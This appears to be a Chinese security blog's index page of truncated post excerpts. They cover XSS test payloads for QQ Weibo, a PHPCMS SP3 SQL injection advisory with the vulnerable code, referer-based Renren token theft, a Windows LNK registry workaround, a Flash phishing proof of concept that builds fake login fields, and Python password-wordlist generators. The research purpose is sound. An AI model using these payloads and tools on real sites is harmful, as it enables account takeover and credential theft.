Author: 坏人咖啡

以下是来自QQ微博的内容，大家可以在向聊天记录中输入以下内容，然后点开聊天记录就可以看到效果了。

测试代码：

[html]
<input onclick=’alert(huairen.me)’/>
<select><option>huairen.me<option></select>
<iframe src=’ http://huairen.me’ width=200 height=200></iframe>
[/html]

效果图：

貌似这是由于划词搜索造成的。

本文只用于学习研究，请勿用于其它用途。

大早上曹同学就给我发过来一个这东西，就看了一下和他讨论了一下，顺便就发出来了，以下代码分别来自曹同学博客和老君的博客

简单描述：
PHPCMS SP3版本，SQL注入，可远程利用，成功后获取网站管理员密码

详细描述：
PHPCMS 2008的sp3版本中的fckeditor/data.php文件中当action为get时，且当$hour未被赋值或赋值小于1，则$where_time变量未被赋值，可构造任意数据提交，从而形成SQL注入，进而获取管理员用户名和密码，从而获取网站控制权

问题文件：fckeditor/data.php

[php]
…
switch($action)
{
case ”:
if($data == ”) exit;
if(CHARSET != ‘utf-8’) $data = iconv(‘utf-8′, CHARSET, $data);
$db->query("INSERT INTO ".DB_PRE."editor_data SET userid=’$_userid’, editorid=’$editorid’, ip=’".IP."’, created_time=’".TIME."’, data=’$data’");
echo ‘ok’;
break;

case ‘get’:
$hour = intval($hour);
if($hour>1)
{
$hour_start = TIME – $hour*3600;
$hour_end = TIME – ($hour-1)*3600;
$where_time = " …

作者：riusksk

当初发现这个漏洞纯属意外，因为这个token是需要通过referer盗取，比如以下代码就可获取referer:
[php]

<?php

$referer = (!empty($_SERVER[‘HTTP_REFERER’])) ? $_SERVER[‘HTTP_REFERER’] : ‘Unspecified’;

echo htmlspecialchars("$referer");

?>

[/php]

而刚好trojancyborg同学先浏览了他的人人网wap主页，估计是用手机上的，然后再转到我的博客，这样他的 referer就没记录在博客大巴的管理中心里面的访问来源里，其中就包含有这个认证token,它可直接通过url提交绕过身份验证，即url authentication token。访问URL格式如下：

http://3g.renren.com/profile.do?id=263,*63,**2&sid=5437ce***3c0d5d1457*****85f6f3e32&9agldk&htf=2 (为安全起见，用*号过滤掉)

这个也可以结合XSS来盗取referer，正如盗取cookie一样，只是比用cookie更方便一些，毕竟它直接通过URL即可获取对方主页的管理权限了。但也需要一定的运气，对方得从人人网的wap页面中跳转过来才行。如果大伙有什么更好的盗取方式，希望告之一下！当时在trojancyborg同学主页上发了篇日志，恶搞一下，还好他大人有大量，没找俺麻烦，呵呵……

对于这种漏洞的防御方法 ，正如余弦大牛在paper中所说的：使用cookie认证方式（可惜哥的破手机N3100不支持cookie），或者过滤一切可获取referer的对象，比如：

▪ html tags: img/iframe/a/area/…
▪ css styles: background:url()/@import/moz‐binding/…

在安装漏洞相应的补丁之前，Windows用户可以采用以下的临时解决方案来免受漏洞的影响：

注意：* 禁止显示快捷方式图标的功能。注意这将使得所有快捷方式显示空白图标。

  执行如下步骤：

  1. 点击 “开始” -> “运行”，在文本框中输入“regedit”，点击 “确定” 启动注册表编辑器。
  
  2. 在注册表编辑器中定位并选中如下的注册表项：
    
     HKEY_CLASSES_ROOT\lnkfile\shellex\IconHandler
    
  3. 在 “文件” 菜单中选择 “导出”。
  
  4. 在导出注册表文件对话框的文件名处输入 “LNK_Icon_Backup.reg” ，点击 “确定”。
  
     此步骤保存相关的注册表配置到备份文件中，待安装了正式的补丁后可以双击 LNK_Icon_Backup.reg 备份文件重新导入到注册表恢复系统配置。
  
  5. 在注册表右边窗口右键点击 “默认” 表项，选择 “修改”，清空 “数值数据” 框中的数据，点击 “确定”。
  
  6. 重启系统。

官方临时补丁工具

下载:Microsoft Fix it 50486(修复工具)
下载:Microsoft Fix it …

算是学Python的第一个作品吧，感谢阿神同学的无私帮助，没有你就没有这个版本了。
支持全密码长度生成，字典包括了大小写字母、特殊符号和数字。
使用条件：
windows下需要安装Python的环境，Linux下可以直接使用
使用方法：
python mydict.py 4 -w mydict.txt

代码：
[python]
#!/usr/bin/python
# -*- coding:utf-8 -*-
#*********************************************************
#* 咖啡暴力字典生成器 …

作者：80vul
Zend Studio是一个屡获大奖的专业 PHP 集成开发环境，具备功能强大的专业编辑工具和调试工具，支持PHP语法加亮显示，支持语法自动填充功能，支持书签功能，支持语法自动缩排和代码复制功能，内置一个强大的PHP代码调试工具，支持本地和远程两种调试模式，支持多种高级调试功能。

漏洞描述：
the description of a function of php script does’nt be escaped or htmlencode, so it lead to can be exploited to execute arbitrary HTML and script code what the attacker inject evil codz on function’s …

作者：PZ
一 综述

百度空间在个人主页应用上传自定义的Flash模板,Flash显示在主页上的时,HTML容器的 allowNetworking=internal.使得用户上传的flash可以和网络进行通信.再结合百度空间的CSS编辑,可以进行钓鱼攻击.

二 PoC

见http://hi.baidu.com/p__z
[java]
==phishing.fla==================================
stop();
// show once
var my_so:SharedObject = SharedObject.getLocal("cookie");
if (!my_so.data.isloaded) {
my_so.data.isloaded = true;
my_so.flush();
} else {
clearAll();
}
var myformat:TextFormat = new TextFormat();
myformat.font = "宋体";
myformat.size = 13;
this.createTextField("username_txt", this.getNextHighestDepth(), 569, 139, 137, 22);
username_txt.border = false;
username_txt.type = "input";
username_txt.text = "";
username_txt.onChanged = function(textfield_txt:TextField) {
username_txt.setTextFormat(myformat);
};
this.createTextField("password_txt", this.getNextHighestDepth(), 569, 171, …

汗颜自己简单改了下，还在学习Python中~~! 大家可以自由选择生成密码的长度和生成密码的组合，有四种组合，数字、小写字母、大小字母、数字+大小写字母+特殊符号！使用方法“zidian.py all 8 10 -w test.txt”

代码：
[python]
#!/usr/bin/python
# -*- coding:utf-8 -*-
#字典生成器，可以按密码类型生成指定长度的密码和数量
#密码类型: alphanum（数字）, alpha（小写字母）, alphacap（大写字母）, all（数字+大小写字母+特殊符号）
#http://huairen.me

import random, sys

def title():
   print “\n\t   Huairen.Me Password dict ”
   print “\t———————————————–\n”

def passgen(choice, length):

   passwd = “”
   alphanum = (‘0123456789’)
   alpha = (‘abcdefghijklmnopqrstuvwxyz’)
   alphacap = (‘ABCDEFGHIJKLMNOPQRSTUVWXYZ’)
   all …